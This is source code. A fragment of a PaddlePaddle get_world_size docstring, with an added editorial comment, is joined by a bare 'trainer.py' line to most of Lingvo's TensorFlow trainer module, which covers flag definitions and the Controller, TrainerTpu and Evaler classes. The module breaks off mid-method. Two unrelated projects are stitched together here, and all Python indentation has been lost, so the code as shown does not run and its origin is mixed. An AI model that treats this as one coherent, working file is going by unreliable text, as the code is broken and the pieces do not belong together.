Its value is equal to the value of the environment variable ``PADDLE_TRAINERS_NUM`` .
The default value is 1.
Returns:
(int) The number of trainers.
Examples:
.. code-block:: python
import paddle
import paddle.distributed as dist
# execute this command in terminal: export PADDLE_TRAINERS_NUM=4
print("The world_size is %d" % dist.get_world_size())
# The world_size is 4
"""
return ParallelEnv().world_size
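# Hedged note (not part of the original module): the environment variables
# checked in init_parallel_env() (FLAGS_selected_gpus, PADDLE_TRAINER_ID,
# PADDLE_CURRENT_ENDPOINT, PADDLE_TRAINERS_NUM, PADDLE_TRAINER_ENDPOINTS)
# are normally populated by a launcher such as
#   python -m paddle.distributed.launch train.py
# or by dist.spawn() as in the docstring example above, rather than being
# exported by hand.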
|
trainer.py
|
# Lint as: python3
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
r"""Trainer.
To run locally:
.. code-block:: bash
$ bazel build -c opt //lingvo:trainer
$ bazel-bin/lingvo/trainer --logtostderr \
--model=image.mnist.LeNet5 --mode=sync --logdir=/tmp/lenet5 \
--run_locally=cpu
To use GPU, add `--config=cuda` to build command and set `--run_locally=gpu`.
"""
import contextlib
import os
import re
import sys
import threading
import time
from lingvo import base_trial
from lingvo import datasets
from lingvo import executor
from lingvo import model_imports
from lingvo import model_registry
from lingvo import pdb_wrapper
from lingvo import trainer_impl
from lingvo import trainer_utils # pylint: disable=unused-import
import lingvo.compat as tf
from lingvo.core import base_model
from lingvo.core import base_model_params
from lingvo.core import checkpointer
from lingvo.core import cluster_factory
from lingvo.core import inference_graph_exporter
from lingvo.core import metrics
from lingvo.core import py_utils
from lingvo.core import summary_utils
from lingvo.core import tpu_embedding_layers
import numpy as np
from lingvo import base_runner
from google.protobuf import text_format
# pylint:disable=g-direct-tensorflow-import
from tensorflow.core.framework import summary_pb2
from tensorflow.core.protobuf.tpu import compilation_result_pb2 as tpu_compilation_result
from tensorflow.python.tpu import device_assignment as device_assignment_lib
from tensorflow.python.tpu import tpu
from tensorflow.python.tpu import tpu_function
from tensorflow.python.tpu import training_loop as tpu_training_loop
from tensorflow.python.tpu.ops import tpu_ops
# pylint:enable=g-direct-tensorflow-import
tf.flags.DEFINE_bool(
'interactive', False,
'If True, enter interactive IPython for the controller job.')
tf.flags.DEFINE_string(
'run_locally', '',
'Can be empty, cpu, or gpu. If not empty, ignores cluster configuration '
'flags and runs controller and trainer in a single local process.')
tf.flags.DEFINE_string('tf_master', '', 'TF runtime.')
tf.flags.DEFINE_string(
'cluster_spec', '', 'A tf.train.ClusterSpec to override the master. '
'The dict is specified as: job=host1:port1,host2:port2,'
'host3:port3@job2=host3:port4,...')
tf.flags.DEFINE_string(
'mode',
'async', 'How this trainer binary is used. '
'async: used in an async training setup; '
'sync: used in a sync training setup; '
'shell: an interactive shell for development; '
'inspect_evaler: print evaler dataset names; '
'inspect_decoder: print decoder dataset names; '
'inspect_model: print the names and shapes of variables for this model; '
'inspect_params: print the model params corresponding to each dataset; '
'write_inference_graph: write inference graphs to logdir.',
allow_hide_cpp=True)
tf.flags.DEFINE_multi_string(
'inspect_model_part_regex', None,
'This argument is used to check the number of params in different part '
'of the model. (e.g. encoder or decoder or any specific layers of '
'encoder/decoder.) The value should be in the name:regex format. '
'For example, --inspect_model_part_regex=encoder:^.+conformer_encoder.+ '
    'means any tensor whose name matches the regex `^.+conformer_encoder.+` will '
'be counted as `encoder`, and the number of params in `encoder` will be '
'printed out when `inspect_model`. ')
tf.flags.DEFINE_integer('inspect_model_topn', 0,
                        'print `topn` tensors when inspect_model')
tf.flags.DEFINE_string('controller_job', '/job:controller', 'Job name.')
tf.flags.DEFINE_integer('controller_gpus', 0, 'Number of controller GPUs.')
tf.flags.DEFINE_integer('worker_replicas', 1, 'Number of replicas.')
tf.flags.DEFINE_integer('worker_gpus', 0, 'Number of gpus to use per replica.')
tf.flags.DEFINE_integer('worker_split_size', 1,
'Number of devices for one split.')
tf.flags.DEFINE_string('ps_job', '/job:ps', 'Job name')
tf.flags.DEFINE_integer('ps_replicas', 1, 'Number of replicas.')
tf.flags.DEFINE_integer('ps_gpus', 0, 'Number of gpus to use per replica.')
tf.flags.DEFINE_string('input_job', '/job:input', 'Job name')
tf.flags.DEFINE_integer('input_replicas', 0, 'Number of replicas.')
tf.flags.DEFINE_string(
'input_targets', '', 'Target network addresses for the '
'input job. E.g., a single ip:port, or a list of '
'comma-separated grpc://ip:port, etc.')
tf.flags.DEFINE_string('tf_data_service_address', '',
'The address of the tf.data service.')
tf.flags.DEFINE_string(
'inference_graph_filename', None,
'Output inference graph filename. If unspecified, output two inference '
'graphs, one for CPU and one for TPU using the default settings.')
tf.flags.DEFINE_string(
'inference_graph_device', None,
'Type of device the output inference graph is for. This flag is applicable '
'only when FLAGS.inference_graph_filename is specified.')
tf.flags.DEFINE_integer(
'inference_graph_random_seed', None,
'Random seed to fix when exporting inference graph. '
'Not fixed when set to None.')
tf.flags.DEFINE_list(
'graph_def_filename', [],
'Output inference graph_def filenames. Defaults to CPU graph if '
'inference_graph_filename and inference_graph_device are not specified.')
tf.flags.DEFINE_string(
'inference_dataset_name', 'Test',
    'Name of the dataset whose params are used when extracting the inference graph.')
tf.flags.DEFINE_bool(
'inference_gen_tpu_init_op', True,
'Whether the tpu_init_op subgraph is generated for TPU inference graph.')
tf.flags.DEFINE_bool(
'evaler_in_same_address_as_controller', False,
'Whether or not evaler is in the same address space as '
'controller. This flag is meant for unittest only.')
tf.flags.DEFINE_string(
'vizier_reporting_job', 'evaler',
'Job responsible for reporting metrics. This specifies a '
'job prefix, evaler will match all evaler jobs, while '
'evaler_dev and decoder_dev will only match the corresponding '
'jobs that are on the dev set.')
tf.flags.DEFINE_bool(
'add_summary', None,
    'Whether we should output summaries. The default value "None" enables '
'summaries based on the job type.')
tf.flags.DEFINE_bool('disable_tf2', False,
                     'Whether to run on TensorFlow without V2 behaviors.')
@tf.flags.validator('vizier_reporting_job')
def _ValidateVizierReportingJob(value):
if value in ['evaler', 'decoder']:
return True
if value.startswith('evaler_') or value.startswith('decoder_'):
return True
tf.logging.info('vizier_reporting_job should usually start with evaler or '
'decoder, unless in executor/program mode. '
f'vizier_reporting_job={value}')
return True
tf.flags.DEFINE_bool(
'checkpoint_in_trainer_tpu', False,
'Whether to enable checkpointing in TrainerTpu, allowing for '
    'operation without a separate Controller task. '
'This flag also disables checkpointing from the Controller, '
'but still allows it to write summaries.')
tf.flags.DEFINE_string(
'tpu', None,
'The Cloud TPU on GCP to use for training. This should be either the name '
'used when creating the Cloud TPU, or a grpc://ip.address.of.tpu:8470 '
'url. If set, other cluster parameters (such as --cluster_spec) will be '
'configured automatically with TPUClusterResolver.')
tf.flags.DEFINE_string(
'gcp_project', None,
'Project name for the Cloud TPU-enabled project. If not specified, we '
'will attempt to automatically detect the GCE project from metadata.')
tf.flags.DEFINE_string(
'tpu_zone', None,
'GCE zone where the Cloud TPU is located in. If not specified, we '
'will attempt to automatically detect the GCE project from metadata.')
# Please consider adding model params instead of adding flags.
FLAGS = tf.flags.FLAGS
# useful for debugging.
def _StartShell(local_ns=None):
# An interactive shell is useful for debugging/development.
import IPython # pylint: disable=g-import-not-at-top
user_ns = {}
if local_ns:
user_ns.update(local_ns)
user_ns.update(globals())
IPython.start_ipython(argv=[], user_ns=user_ns)
class Controller(base_runner.BaseRunner):
"""Controller for a training cluster."""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
if py_utils.IsEagerMode():
raise RuntimeError('The controller job is not supported in eager mode.')
self._job_name = 'controller'
assert not self._model_task_name, 'Controller needs all tasks!'
self._control_dir = os.path.join(self._logdir, 'control')
tf.io.gfile.makedirs(self._control_dir)
self._checkpoint_in_controller = True
if FLAGS.checkpoint_in_trainer_tpu:
self._checkpoint_in_controller = False
if self._early_stop:
tf.logging.warning('Controller ignoring early_stop since '
'TrainerTpu is driving training.')
self._early_stop = None
with self._graph.as_default(), tf.container(self._container_id):
with self._cluster, tf.device(self._cluster.GetPlacer()):
self._summary_writer = self._CreateSummaryWriter(self._control_dir)
self._model = self.params.Instantiate()
self._params = self._model.params
self._model.ConstructFPropBPropGraph()
self._summary_op = tf.summary.merge_all()
self._initialize_tables = tf.tables_initializer()
self._initialize_local_vars = tf.local_variables_initializer()
self._initialize_global_vars = tf.global_variables_initializer()
self.enqueue_ops = tf.get_collection(py_utils.ENQUEUE_OPS)
if self._checkpoint_in_controller:
self.checkpointer = self._CreateCheckpointer(
self._train_dir,
self._model,
init_op=self._initialize_global_vars)
self._ExportMetrics(params=self.params)
self._model_analysis, self._total_num_params = summary_utils.ModelAnalysis(
self._model, FLAGS.inspect_model_topn, FLAGS.inspect_model_part_regex)
py_utils.LogMultiLines('MODEL ANALYSIS', self._model_analysis)
self._WriteToLog(self._model_analysis, self._control_dir,
'model_analysis.txt')
self._WriteToLog(self.params.ToText(), self._control_dir, 'params.txt')
self._WriteToLog(
text_format.MessageToString(self.params.ToProto(), as_utf8=True),
self._control_dir, 'params.pbtxt')
self._summary_writer.add_graph(self._graph)
def _CreateCheckpointer(self, train_dir, model, init_op=None):
"""Wrapper method for override purposes."""
return checkpointer.Checkpointer(train_dir, model, init_op)
def Start(self):
self._RunLoop('controller', self._Loop)
def StartEnqueueOp(self, op):
self._RunLoop(
'controller/enqueue_op/%s' % op.name, self._LoopEnqueue, loop_args=[op])
def _Loop(self):
with tf.container(self._container_id), self._GetSession() as sess:
if FLAGS.interactive:
# Into interactive debugging mode.
_StartShell(locals())
return
# This initializes local tables
sess.run(self._initialize_tables)
# This initializes local variables.
sess.run(self._initialize_local_vars)
for task in self._model.tasks:
task.input.Initialize(sess)
# TODO(zhifengc): Moves these options into params.
tp = self.params.train
summary_interval_steps = tp.summary_interval_steps
save_interval_seconds = tp.save_interval_seconds
next_summary_step = 1
if not self._checkpoint_in_controller:
global_step = self._WaitUntilInit(sess)
while True:
now = time.time()
next_iteration_seconds = now + min(
10, save_interval_seconds) # 10 seconds or less
if self._checkpoint_in_controller:
# Init/restore variable if needed.
self.checkpointer.RestoreIfNeeded(sess)
global_step = sess.run(self._model.global_step)
if self._ShouldStop(sess, global_step):
tf.logging.info('Training finished.')
if self._checkpoint_in_controller:
self.checkpointer.Save(sess, global_step)
sess.close()
self._DequeueThreadComplete()
return
if self._checkpoint_in_controller:
# Checkpoint if it's time.
self.checkpointer.MaybeSave(sess, global_step)
# Summary.
if self._summary_op is not None and global_step >= next_summary_step:
global_step, summary_str = sess.run(
[self._model.global_step, self._summary_op])
next_summary_step = global_step + summary_interval_steps
if isinstance(summary_str, np.ndarray) and summary_str.size == 0:
tf.logging.info('Skipping summary: %s', summary_str)
else:
self._summary_writer.add_summary(summary_str, global_step)
tf.logging.info('Write summary @%s', global_step)
self._SummarizeValue(global_step, 'total_num_params',
self._total_num_params)
tf.logging.info('Write summary done: step %d', global_step)
now = time.time()
if now < next_iteration_seconds:
time.sleep(next_iteration_seconds - now)
def _SummarizeValue(self, step, tag, value):
self._summary_writer.add_summary(
metrics.CreateScalarSummary(tag, value), step)
Trainer = trainer_impl.Trainer
class TrainerTpu(base_runner.BaseRunner):
"""Trainer on TPU."""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._job_name = 'trainer_tpu'
# Multiple TPU trainer tasks not tested/implemented.
assert self._cluster.num_replicas == 1
data_parallelism = self._cluster.num_splits_per_client
assert data_parallelism
num_devices_per_split = self._cluster.num_devices_per_split
tf.logging.info('data_parallelism: %d, num_devices_per_split: %d',
data_parallelism, num_devices_per_split)
self._steps_per_loop = min(self.params.train.tpu_steps_per_loop,
self.params.train.max_steps)
self._step_rate_tracker = summary_utils.StepRateTracker()
self._compile_op = None
self._initialized = threading.Event()
tf.logging.info(
'Creating TrainerTpu using data parallelism %s '
'and %s steps_per_loop', data_parallelism, self._steps_per_loop)
@py_utils.RetryOnTransientTfError()
def _WaitUntilInitTpu():
"""Wait until the model is ready."""
try:
# tpu.initialize_system() is called with None as embedding_config, as
# embedding_config is not available yet. Later in _Loop, it is called
# with the correct embedding_config. Since it cannot be called twice in
# the same graph with different embedding_config, we use a dummy_graph
# here.
dummy_graph = tf.Graph()
with dummy_graph.as_default():
tpu_initialize_system_op = tf.tpu.initialize_system(
embedding_config=None, job=None)
with self._GetSession(graph=dummy_graph) as sess:
topology = sess.run(tpu_initialize_system_op)
if self.params.train.tpu_computation_shape is None:
computation_shape = py_utils.ComputationShape(num_devices_per_split,
topology)
else:
computation_shape = self.params.train.tpu_computation_shape
assert num_devices_per_split == np.prod(computation_shape)
if self.params.train.tpu_device_order_mode is None:
device_assignment = device_assignment_lib.device_assignment(
topology,
computation_shape=computation_shape,
num_replicas=data_parallelism)
else:
device_assignment = device_assignment_lib.device_assignment(
topology,
computation_shape=computation_shape,
num_replicas=data_parallelism,
device_order_mode=self.params.train.tpu_device_order_mode)
py_utils.SetTpuDeviceAssignment(device_assignment)
tf.logging.info('device_assignment.core_assignment: %s',
str(device_assignment.core_assignment))
tf.logging.info('device_assignment.topology.device_coordinates: %s',
str(device_assignment.topology.device_coordinates))
except py_utils.transient_tf_errors as e:
tf.logging.info('TPU initialization failed: %s', e)
raise
_WaitUntilInitTpu()
with self._graph.as_default(), tf.container(
self._container_id), contextlib.ExitStack() as stack:
if FLAGS.pdb_on_exception:
stack.enter_context(pdb_wrapper.catch_post_mortem())
self._summary_writer = self._CreateSummaryWriter(self._train_dir)
self._CreateTF2SummaryWriter(self._train_dir)
with self._cluster, tf.device(
self._cluster.GetPlacer()), self._TF2SummaryContext():
self._model = self.params.Instantiate()
self._task = self._model.GetTask()
self._task.input.TpuSetup()
self._eval_metrics = metrics.TpuEvalMetrics()
# Needed due to the AddExtraTheta() reference to global_step when
# instantiating the InputGenerator.
_ = py_utils.GetOrCreateGlobalStepVar()
self._CreateTF2SummaryOps()
self._input_stats_summary_interval_steps = (
self._task.input.params.input_stats_summary_interval_steps)
def TpuTrainStep(*args):
"""Train a shard of a batch on a single TPU core.
Args:
*args: metrics values from previous steps.
Returns:
New summed metrics values and a train_op.
"""
self._model.ConstructFPropBPropGraph()
tpu_embedding_collection = (
tpu_embedding_layers.TpuEmbeddingCollection.Get())
self._load_ops = tpu_embedding_collection.load_ops
self._retrieve_ops = tpu_embedding_collection.retrieve_ops
self._tpu_embedding = tpu_embedding_collection.tpu_embedding
per_step_eval_metrics = self._eval_metrics.SetMetrics(
self._task.eval_metrics, args)
outfeed_op = self._OutfeedEnqueue(self._task.per_example_tensors)
summed_metrics = []
assert len(per_step_eval_metrics) == len(args)
with tf.control_dependencies([outfeed_op]):
for x, y in zip(per_step_eval_metrics, args):
summed_metrics.append(x + y)
return summed_metrics + [self._task.train_op]
@tpu_function.on_device_training_loop
def TpuTrain():
loop_result = tpu_training_loop.repeat(
self._steps_per_loop,
TpuTrainStep,
inputs=self._eval_metrics.initial_values,
name='train_loop')
# Final metrics are the avg across self._steps_per_loop steps.
return self._eval_metrics.FinalizeMetrics(loop_result)
self._compile_op, batch_parallel_res = tpu.split_compile_and_shard(
TpuTrain,
num_shards=data_parallelism,
device_assignment=py_utils.GetTpuDeviceAssignment())
outfeed_dequeue_op = self._OutfeedDequeueLoop(
self._task.per_example_tensors, self._steps_per_loop,
self._cluster.num_splits_per_client)
def _ConstructPostTrainingLoop(train_loop_op, outfeed_dequeue_op):
"""Returns the op for tpu training with tail cpu computation."""
# Adds a tail computation that is run after the tpu_training loop
# step finishes. This allows us to run certain computation that
# acts on the variable between tpu_train_loop iterations and
# amortizing the cost of the operations. Alternative of running
# tpu.outside_compilation & using tf.cond is expensive.
with tf.control_dependencies(train_loop_op):
self._model.ConstructPostTrainingLoop(outfeed_dequeue_op)
with tf.control_dependencies([self._task.post_training_loop_op]):
return ([[tf.identity(o) for o in train_loop_op],
outfeed_dequeue_op])
# Get metric result from a single replica; they are all same here.
all_tpu_ops = [t[0] for t in batch_parallel_res]
self._tpu_train_ops = (
_ConstructPostTrainingLoop(all_tpu_ops, outfeed_dequeue_op))
self._initialize_local_vars = tf.local_variables_initializer()
self._initialize_global_vars = tf.global_variables_initializer()
self._initialize_tables = tf.tables_initializer()
if FLAGS.checkpoint_in_trainer_tpu:
self.checkpointer = checkpointer.Checkpointer(
self._train_dir, self._model, init_op=self._initialize_global_vars)
self.enqueue_ops = self._task.input.tpu_infeed_op
tf.logging.info('Trainer number of enqueue ops: %d',
len(self.enqueue_ops))
if self._task.input.input_data_summary_layout is not None:
self._summary_writer.add_summary(
self._task.input.input_data_summary_layout)
if FLAGS.checkpoint_in_trainer_tpu:
self._model_analysis, self._total_num_params = (
summary_utils.ModelAnalysis(self._model, FLAGS.inspect_model_topn,
FLAGS.inspect_model_part_regex))
py_utils.LogMultiLines('MODEL ANALYSIS', self._model_analysis)
self._WriteToLog(self._model_analysis, self._train_dir,
'model_analysis.txt')
# Saves the trainer params.
self._WriteToLog(self.params.ToText(), self._train_dir,
'trainer_params.txt')
def _GetSession(self, **kwargs):
return super()._GetSession(cluster_def=self._worker_cluster_def, **kwargs)
def _OutfeedEnqueue(self, per_example_tensors):
if not per_example_tensors:
return tf.no_op()
per_example_tensors = py_utils.NestedMap(per_example_tensors)
return tpu_ops.outfeed_enqueue_tuple(per_example_tensors.Flatten())
def _OutfeedDequeueLoop(self, per_example_tensors, num_loops, num_devices):
"""Process all per-example tensor outfeed data for a TPU sess.run.
Args:
per_example_tensors: dict of key -> tensor as generated by TpuTrainStep.
num_loops: number of times that TpuTrainStep will be executed by TpuTrain.
num_devices: number of TPU cores assigned to this process.
Returns:
A dict of per-example tensors from the latest TpuTrainStep.
"""
if not per_example_tensors:
return tf.no_op()
tensor_shapes = [
py_utils.GetShape(per_example_tensors[key])
for key in sorted(per_example_tensors)
]
tensor_types = [
tf.as_dtype(per_example_tensors[key].dtype)
for key in sorted(per_example_tensors)
]
def LoopBody(i, *input_arrays):
"""Process outfeed data for a single TpuTrainStep.
Args:
i: current loop index.
*input_arrays: One tf.TensorArray per outfeed tensor.
Returns:
i+1 (new index) plus post-write tf.TensorArray handles.
"""
# Outfeed ops execute on each JF node, so they must be located on the
# nodes.
outfeed_devices = []
device_assignment = py_utils.GetTpuDeviceAssignment()
assert device_assignment
for replica in range(device_assignment.num_replicas):
for core in range(device_assignment.num_cores_per_replica):
with tf.device(device_assignment.host_device(replica, core)):
outfeed_devices.append(
tpu_ops.outfeed_dequeue_tuple(
tensor_types,
tensor_shapes,
device_ordinal=device_assignment.tpu_ordinal(replica,
core)))
offset = i * num_devices
output_arrays = list(input_arrays)
# Each output_array holds a different per-example tensor. We get results
# for each tensor from each TPU for each TpuTrainStep call.
for j in range(len(output_arrays)):
for k in range(len(outfeed_devices)):
output_arrays[j] = output_arrays[j].write(offset + k,
outfeed_devices[k][j])
return tuple([i + 1] + output_arrays)
def LoopCond(i, *output_arrays):
del output_arrays
return i < num_loops
output_arrays = [
tf.TensorArray(
tensor_types[i],
size=num_loops * num_devices,
element_shape=tensor_shapes[i]) for i in range(len(tensor_shapes))
]
# Loop once for each time that TpuTrainStep runs.
output_arrays = tf.while_loop(
LoopCond, LoopBody, [0] + output_arrays, parallel_iterations=1)[1:]
concatenated_arrays = [array.concat() for array in output_arrays]
return dict(zip(sorted(per_example_tensors), concatenated_arrays))
def _CleanUp(self):
# If there's an exception, we want _LoopEnqueue to wait until
# everything is initialized before starting up.
self._initialized.clear()
def Start(self):
# Run training.
self._RunLoop('trainer', self._Loop, cleanup_func=self._CleanUp)
def _InfeedLoop(self, sess):
tf.logging.info('_InfeedLoop start')
for _ in range(self._steps_per_loop):
sess.run(self.enqueue_ops)
def StartEnqueueOp(self, op):
# When retrieve ops for TPU embedding is present, we use _InfeedLoop above
# instead to make sure enqueue and retrieve does not happen at the same
# time as required by TPU embedding.
# We can remove this by using a tf.while_loop driven infeed op.
if self._retrieve_ops:
return
self._RunLoop(
'trainer/enqueue_op/%s' % op.name, self._LoopEnqueue, loop_args=[op])
def _SummarizeValue(self, steps, tag, value):
self._summary_writer.add_summary(
metrics.CreateScalarSummary(tag, value), steps)
def _LoopEnqueue(self, op):
# Evaler/Controller jobs may find that the trial is infeasible and report
# done earlier. This is an important check since the trainer may retry
# indefinitely without it.
if self._trial.ShouldStop():
tf.logging.info('Training skipped (trial requested to stop).')
return
# Wait for _Loop to initialize variables first before attempting to infeed.
tf.logging.info('_LoopEnqueue waiting for _initialized...')
self._initialized.wait()
tf.logging.info('_LoopEnqueue proceeding.')
# The global step may not be initialized in this thread if the target server
# uses session state isolation (e.g. Cloud TPUs).
sess = self._GetSession()
if FLAGS.checkpoint_in_trainer_tpu:
self.checkpointer.RestoreGlobalStepIfNeeded(sess)
# Get merged summary op for training related input data stats from the
    # task's input generator.
self._merged_input_data_summary_op = (
self._task.input.merged_input_data_summary_op)
return super()._LoopEnqueue(op, sess)
def _Loop(self):
# Evaler/Controller jobs may find that the trial is infeasible and report
# done earlier. This is an important check since the trainer may retry
# indefinitely without it.
if self._trial.ShouldStop():
tf.logging.info('Training skipped (trial requested to stop).')
self._DequeueThreadComplete()
return
with tf.container(
self._container_id), self._cluster, self._GetSession() as sess:
config_proto = (
self._tpu_embedding.config_proto
if self._tpu_embedding is not None else None)
sess.run(
tf.tpu.initialize_system(embedding_config=config_proto, job=None))
sess.run(self._initialize_tables)
sess.run(self._initialize_local_vars)
self._InitializeTF2SummaryWriter(sess)
if FLAGS.run_locally == 'tpu':
sess.run(self._initialize_global_vars)
self._SetStatusMessage('Compiling ...')
compilation_result = sess.run(self._compile_op)
comp_result_proto = tpu_compilation_result.CompilationResultProto()
comp_result_proto.ParseFromString(compilation_result)
if comp_result_proto.status_error_message:
tf.logging.fatal('Compilation failed: {}'.format(
comp_result_proto.status_error_message))
self._SetStatusMessage('Compiling done.')
if FLAGS.checkpoint_in_trainer_tpu:
# For b/134415393 -- better to initialize to a known state than
# rely on what's in the session on the trainer/TPU worker.
tf.logging.info('TrainerTpu: Force restore or initialize.')
self.checkpointer.Restore(sess, force_reinitialize=True)
global_step = sess.run(self._model.global_step)
self._initialized.set()
eval_metrics = None
if FLAGS.checkpoint_in_trainer_tpu and global_step == 0:
# Always save a ckpt at step 0.
self.checkpointer.MaybeSave(sess, global_step)
sess.run(self._load_ops)
while True:
train_steps_start = time.perf_counter()
if FLAGS.checkpoint_in_trainer_tpu:
# Init/restore variable if needed.
self.checkpointer.RestoreIfNeeded(sess)
if self._trial.ShouldStopAndMaybeReport(
global_step, eval_metrics) or self._ShouldEarlyStop(sess):
# Early terminate gracefully by setting a new max step horizon: three
# more TPU steps to ensure that the enqueue ops can gracefully
# terminate as well. Otherwise, the enqueue thread may be stuck, e.g.,
# when the queue is filled and the enqueue thread is blocked when
# pushing new data to the queue, if the trainer thread decides to
# early stop (i.e., `self._ShouldEarlyStop(sess)` is true), then the
# enqueue thread could be blocked forever as the trainer thread would
# never consume any new data from the queue. After setting the new
          # max step horizon, the trainer thread would continue to run for 3 loops
# (3K global steps usually), so the enqueue thread could get a chance
# to move forward and run `_ShouldStop()` to stop gracefully.
if self._max_steps_for_early_stop is None:
self._max_steps_for_early_stop = global_step + 3 * self._steps_per_loop
tf.logging.info('Early stopping at step: %d',
self._max_steps_for_early_stop)
if self._ShouldStop(sess, global_step, check_early_stop=False):
tf.logging.info('Training finished.')
if FLAGS.checkpoint_in_trainer_tpu:
self.checkpointer.Save(sess, global_step)
self._DequeueThreadComplete()
return
if self._retrieve_ops:
infeed_loop_thread = threading.Thread(
target=self._InfeedLoop, args=(sess,))
infeed_loop_thread.start()
tpu_train_op_start = time.perf_counter()
values, outfeeds = sess.run(self._tpu_train_ops)
tpu_train_op_secs = time.perf_counter() - tpu_train_op_start
if self._retrieve_ops:
infeed_loop_thread.join()
tf.logging.info('Retrieve params.')
sess.run(self._retrieve_ops)
tf.logging.info('Retrieve params done.')
self._eval_metrics.PackMetricsValues(values)
eval_metrics = self._eval_metrics.metrics
# Note: global_step is incremented by self._steps_per_loop by the
# previous sess.run call.
task_global_step = sess.run(self._task.global_step)
global_step = sess.run(self._model.global_step)
if not self._task.per_example_tensors:
outfeeds = {}
self._task.ProcessFPropResults(sess, task_global_step, eval_metrics,
outfeeds)
self._model.ProcessFPropResults(sess, global_step, eval_metrics,
outfeeds)
step_rate, example_rate, total_examples = (
self._step_rate_tracker.ComputeStepRate(
global_step,
eval_metrics['num_samples_in_batch'][0] * self._steps_per_loop))
self._RunTF2SummaryOps(sess)
self._SummarizeValue(global_step, 'global_step/sec', step_rate)
self._SummarizeValue(global_step, 'examples/sec', example_rate)
self._SummarizeValue(global_step, 'total_samples', total_examples)
if FLAGS.checkpoint_in_trainer_tpu:
self._SummarizeValue(global_step, 'total_num_params',
self._total_num_params)
msg = 'step:%6d, steps/sec: %0.2f, examples/sec: %0.2f' % (
global_step, step_rate, example_rate)
for key, (val, _) in sorted(eval_metrics.items()):
msg += ' %s:%.8g' % (key, val)
self._SummarizeValue(global_step, key, val)
self._SetStatusMessage(msg)
# Add model eval metrics to early stop metric history.
for metric_name, (metric_value, _) in eval_metrics.items():
self._UpdateEarlyStopMetric('train', global_step, metric_name,
metric_value)
checkpoint_write_secs = 0.0
if FLAGS.checkpoint_in_trainer_tpu:
checkpoint_write_start = time.perf_counter()
checkpoint_saved = self.checkpointer.MaybeSave(sess, global_step)
if checkpoint_saved:
checkpoint_write_secs = time.perf_counter() - checkpoint_write_start
train_steps_secs = time.perf_counter() - train_steps_start
self._ExportMetrics(
# Metrics expects python int, but global_step is numpy.int64.
global_step=int(global_step),
step_rate=step_rate,
example_rate=example_rate,
tpu_train_op_secs=tpu_train_op_secs,
checkpoint_write_secs=checkpoint_write_secs,
total_train_steps_secs=train_steps_secs,
**{k: v[0] for k, v in eval_metrics.items()})
class Evaler(base_runner.BaseRunner):
"""Evaler."""
def __init__(self, eval_type, *args, **kwargs):
super().__init__(*args, **kwargs)
self._job_name = 'evaler_' + eval_type
self._output_name = 'eval_' + eval_type
self._export = eval_type == 'train'
if not self._export:
tf.logging.info(f'Job {self._job_name} will not export the model.')
self.params.cluster.do_eval = True
self._cluster = cluster_factory.Cluster(self.params.cluster)
self._eval_dir = os.path.join(self._logdir, self._output_name)
if self._model_task_name:
self._eval_dir += '_' + str(self._model_task_name)
tf.io.gfile.makedirs(self._eval_dir)
self._eval_path = None
    # Multitask params don't have 'task'.
if 'task' in self.params:
self._eval_path = checkpointer.GetSpecificCheckpoint(
self.params.task.eval.load_checkpoint_from)
self._should_report_metrics = self._job_name.startswith(
self._cluster.reporting_job)
with self._graph.as_default(), tf.container(self._container_id):
self._summary_writer = self._CreateSummaryWriter(self._eval_dir)
self._CreateTF2SummaryWriter(self._eval_dir)
with self._cluster, tf.device(
self._cluster.GetPlacer()), self._TF2SummaryContext():
self._model = self.params.Instantiate()
self._params = self._model.params
self._model.ConstructFPropGraph()
self._task = self._model.GetTask(self._model_task_name)
self.checkpointer = self._CreateCheckpointer(self._train_dir,
self._model)
self._CreateTF2SummaryOps()
self._summary_op = tf.summary.merge_all()
self._initialize_tables = tf.tables_initializer()
self._initialize_local_vars = tf.local_variables_initializer()
# No queues are allowed for eval models.
self.enqueue_ops = tf.get_collection(py_utils.ENQUEUE_OPS)
assert not self.enqueue_ops
self._input_stats_summary_interval_steps = (
self._task.input.params.input_stats_summary_interval_steps)
# Saves the graph def.
self._WriteToLog(self.params.ToText(), self._eval_dir, 'params.txt')
if self.params.cluster.task == 0:
tf.io.write_graph(self._graph.as_graph_def(), self._eval_dir,
'%s.pbtxt' % self._output_name)
def _CreateCheckpointer(self, train_dir, model):
"""Wrapper method for override purposes."""
return checkpointer.Checkpointer(train_dir, model)
def Start(self):
self._RunLoop(self._job_name, self._Loop)
def _Loop(self):
"""The main loop."""
with tf.container(
self._container_id), self._cluster, self._GetSession() as sess:
# This initializes local tables
sess.run(self._initialize_tables)
# This initializes local variables.
sess.run(self._initialize_local_vars)
self._InitializeTF2SummaryWriter(sess)
self._task.input.Initialize(sess)
if self._eval_path:
self._EvalOnce(sess, self._eval_path)
self._UpdateProcessedCheckpoints(self._eval_dir, self._eval_path)
elif self._task.params.eval.eval_all_checkpoints:
self._RunOnAllCheckpoints(sess, self._EvalOnce, self._eval_dir)
else:
self._RunOnLatestCheckpoints(sess, self._EvalOnce, self._eval_dir)
if self._should_report_metrics:
tf.logging.info('Reporting trial done.')
self._trial.ReportDone()
tf.logging.info('Evaluation finished.')
def EvalLatestCheckpoint(self, last_path=None):
"""Runs eval once on the latest checkpoint."""
with tf.container(
self._container_id), self._cluster, self._GetSession() as sess:
# This initializes local tables
sess.run(self._initialize_tables)
# This initializes local variables.
sess.run(self._initialize_local_vars)
self._task.input.Initialize(sess)
path = tf.train.latest_checkpoint(self._train_dir)
if not path:
tf.logging.info('No checkpoint available.')
return
elif path == last_path:
tf.logging.info('Latest checkpoint was already evaluated.')
return
self._EvalOnce(sess, path)
def EvalCheckpoint(self, ckpt_id):
with tf.container(self._container_id), self._GetSession() as sess:
# This initializes local tables
sess.run(self._initialize_tables)
# This initializes local variables.
sess.run(self._initialize_local_vars)
self._task.input.Initialize(sess)
path = '{}/ckpt-{:08d}'.format(self._train_dir, ckpt_id)
self._EvalOnce(sess, path)
  def _RemoveScalarSummaries(self, summaries):
    proto = summary_pb2.Summary()
    proto.ParseFromString(summaries)
    # Delete in reverse index order so that removing an entry does not shift
